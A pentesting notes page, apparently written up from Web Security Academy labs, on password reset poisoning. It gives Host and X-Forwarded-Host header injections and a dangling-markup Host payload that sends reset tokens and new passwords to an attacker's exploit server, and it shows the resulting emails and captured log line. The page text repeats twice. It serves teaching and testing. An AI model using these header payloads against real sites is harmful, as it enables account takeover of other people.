Password reset poisoning

PreviousJWT vulnerabilities NextWeb Tech Detection viaa Tokens, Headers & Cookies

Last updated 2 months ago

Password reset poisoning

Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain under their control.

Changing the host header to point the malicious domain

Issue a request by using your own user, intercept the Password Reset process and replace the Host header to point to your domain.

Password reset poisoning via middleware

To perform this attack instead of just replace the host header add:

X-Forwarded-Host: exploit-0a4200f20354f7f78397d1b401e20049.exploit-server.net

This will poison the request to point to your server and then when the user click on it you will obtain the token to change the password in the logs.

Password reset poisoning via dangling markup

If the application doesn’t use reset tokens and instead sends the new password directly in the email body, you can exploit this by injecting HTML in the Host header to break the markup and leak the full content to your malicious server via a GET request.

Sent:     2025-03-28 03:46:12 +0000  
From:     no-reply@<lab-id>.web-security-academy.net  
To:       wiener@exploit-<exploit-id>.exploit-server.net  
Subject:  Account recovery
<p>Hello!</p>
<p>Please <a href='https://<lab-id>.web-security-academy.net/login'>click here</a> to login with your new password: uW9zyg2qaG</p>
<p>Thanks,<br/>Support team</p>
<i>This email has been scanned by the MacCarthy Email Security service</i>

Exploit Payload

You send a request to /forgot-password with a malicious Host header:

Host: <lab-id>.web-security-academy.net:'<a href="//<your-exploit-server>.exploit-server.net/?

This breaks the original link, and turns the rest of the email body into part of the <a href>. The browser (or client) will automatically follow the link and send a GET request to your server.

Raw:

Sent:     2025-03-28 03:42:11 +0000
From:     no-reply@0ac3008a0318e2e88088260e000500ac.web-security-academy.net
To:       wiener@exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net
Subject:  Account recovery

<p>Hello!</p><p>Please <a href='https://0ac3008a0318e2e88088260e000500ac.web-security-academy.net:'<a href="//exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net/?/login'>click here</a> to login with your new password: UalLCIt2ub</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>

Your server wil catch the request:

10.0.3.226  2025-03-28 03:42:46 +0000  
"GET /?/login'>click+here</a>+to+login+with+your+new+password:+5B9ufwHEy7</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1"

PreviousJWT vulnerabilities NextWeb Tech Detection viaa Tokens, Headers & Cookies

Last updated 2 months ago

Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain under their control.

Changing the host header to point the malicious domain

Issue a request by using your own user, intercept the Password Reset process and replace the Host header to point to your domain.

Password reset poisoning via middleware

To perform this attack instead of just replace the host header add:

X-Forwarded-Host: exploit-0a4200f20354f7f78397d1b401e20049.exploit-server.net

This will poison the request to point to your server and then when the user click on it you will obtain the token to change the password in the logs.

Password reset poisoning via dangling markup

Sent:     2025-03-28 03:46:12 +0000  
From:     no-reply@<lab-id>.web-security-academy.net  
To:       wiener@exploit-<exploit-id>.exploit-server.net  
Subject:  Account recovery
<p>Hello!</p>
<p>Please <a href='https://<lab-id>.web-security-academy.net/login'>click here</a> to login with your new password: uW9zyg2qaG</p>
<p>Thanks,<br/>Support team</p>
<i>This email has been scanned by the MacCarthy Email Security service</i>

Exploit Payload

You send a request to /forgot-password with a malicious Host header:

Host: <lab-id>.web-security-academy.net:'<a href="//<your-exploit-server>.exploit-server.net/?

Raw:

Sent:     2025-03-28 03:42:11 +0000
From:     no-reply@0ac3008a0318e2e88088260e000500ac.web-security-academy.net
To:       wiener@exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net
Subject:  Account recovery

<p>Hello!</p><p>Please <a href='https://0ac3008a0318e2e88088260e000500ac.web-security-academy.net:'<a href="//exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net/?/login'>click here</a> to login with your new password: UalLCIt2ub</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>

Your server wil catch the request:

10.0.3.226  2025-03-28 03:42:46 +0000  
"GET /?/login'>click+here</a>+to+login+with+your+new+password:+5B9ufwHEy7</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1"